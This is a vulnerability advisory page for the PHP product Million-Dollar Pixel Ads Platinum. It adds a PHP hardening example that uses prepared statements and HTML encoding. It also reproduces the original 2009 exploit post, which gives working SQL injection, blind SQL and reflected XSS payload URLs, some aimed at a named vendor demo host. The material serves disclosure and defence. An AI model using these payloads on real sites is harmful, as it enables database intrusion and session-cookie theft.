Vendor: Million-Dollar Pixel Ads Platinum
By: Moudi
CVSS: 5.5 (MEDIUM)
CWE: SQL Injection and Blind SQL
Product Name: Million-Dollar Pixel Ads Platinum
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Million-Dollar Pixel Ads Platinum Multiple Remote Vulnerabilities

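The Million-Dollar Pixel Ads Platinum script is vulnerable to SQL injection and blind SQL injection through the `selectcategory` parameter of `search.php`. These vulnerabilities allow an attacker to manipulate SQL queries and potentially access or modify the database. The original advisory below also lists reflected cross-site scripting (XSS) in `buy1.php` (`place`), `index2.php` (`category`) and `search.php` (`selectcategory`).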

Mitigation:

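The vendor has not provided any specific mitigation steps, and no patch is listed for this product. It is recommended to update to a patched version if one becomes available, or otherwise to implement proper input validation to prevent SQL injection attacks: treat `selectcategory`, `category` and `place` as untrusted input, bind them as parameters rather than concatenating them into SQL, and HTML-encode them wherever they are written back into a page.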
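As an illustration of the input validation recommended above, the following is an added PHP example (not code from the vendor or from the original advisory) that handles the `keywords` and `selectcategory` parameters with integer validation, a prepared statement and output encoding. The `ads` table, its columns, the helper names and the in-memory SQLite database are assumptions made for the example; the real script's schema is not shown on this page.

```php
<?php
// Added example: hardened handling of the search.php parameters named in the advisory.
// Schema, helper names and the SQLite database are constructed for illustration.

function search_ads(PDO $db, array $query): array
{
    // selectcategory is a numeric id: accept only a positive integer, so SQL
    // fragments or markup in this parameter never reach the query.
    $category = filter_var($query['selectcategory'] ?? null, FILTER_VALIDATE_INT,
                           ['options' => ['min_range' => 1]]);
    if ($category === false) {
        return ['error' => 'invalid category', 'rows' => []];
    }
    // Escape LIKE wildcards in the free-text keyword, then bind it as data.
    $like = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], (string)($query['keywords'] ?? ''));
    $stmt = $db->prepare(
        "SELECT title FROM ads WHERE category_id = :cat AND title LIKE :kw ESCAPE '!'"
    );
    $stmt->bindValue(':cat', $category, PDO::PARAM_INT);
    $stmt->bindValue(':kw', '%' . $like . '%', PDO::PARAM_STR);
    $stmt->execute();
    return ['error' => null, 'rows' => $stmt->fetchAll(PDO::FETCH_COLUMN)];
}

// Encode every value that is echoed back into HTML (addresses the reflected XSS).
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample data and requests (parameter values as they arrive after URL decoding).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE ads (category_id INTEGER, title TEXT)");
$db->exec("INSERT INTO ads VALUES (1, 'Pixel block A'), (2, 'Pixel block B')");

$requests = [
    ['keywords' => 'Pixel', 'selectcategory' => '1'],
    ['keywords' => '1', 'selectcategory' => '1 union select version()--'],
    ['keywords' => '1', 'selectcategory' => '"><script>alert(document.cookie);</script>'],
];
foreach ($requests as $q) {
    $r = search_ads($db, $q);
    $out = $r['error'] ?? implode(', ', array_map('h', $r['rows']));
    echo h($q['selectcategory']), ' => ', $out, "\n";
}
```

Only the first request returns a row; the other two are rejected before any SQL runs, and the rejected value is printed HTML-encoded rather than as markup.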

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] Million-Dollar Pixel Ads Platinum Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ Million-Dollar Pixel Ads Platinum ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.turnkeysetup.net/details_million-platinum.php  ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ OFF ]
        [»] Price:              [ $447.97 ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : SQL INJECTION vulnerability ]===	
	
[»] http://www.site.com/patch/search.php?keywords=1&selectcategory=[SQL]&submit=search

[»] http://www.turnkeysetup.net/demos/million/search.php?keywords=1&selectcategory=1+union+select+version()--&submit=search

===[ Exploit + LIVE : BLIND SQL vulnerability ]===

[»] http://www.site.com/patch/search.php?keywords=1&selectcategory=[BLIND]

[»] http://www.turnkeysetup.net/demos/million/search.php?keywords=1&selectcategory=1 and 1=1+union+select+version()--&submit=search

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/buy1.php?category=11&place=[XSS]
[»] http://www.site.com/patch/index2.php?category=[XSS]
[»] http://www.site.com/patch/search.php?keywords=1&selectcategory=[XSS]

[»] http://www.turnkeysetup.net/demos/million/buy1.php?category=11&place="><script>alert(document.cookie);</script>
[»] http://www.turnkeysetup.net/demos/million/index2.php?category="><script>alert(document.cookie);</script>
[»] http://www.turnkeysetup.net/demos/million/search.php?keywords=1&selectcategory="><script>alert(document.cookie);</script>

Author: Moudi

###########################################################################

# milw0rm.com [2009-07-24]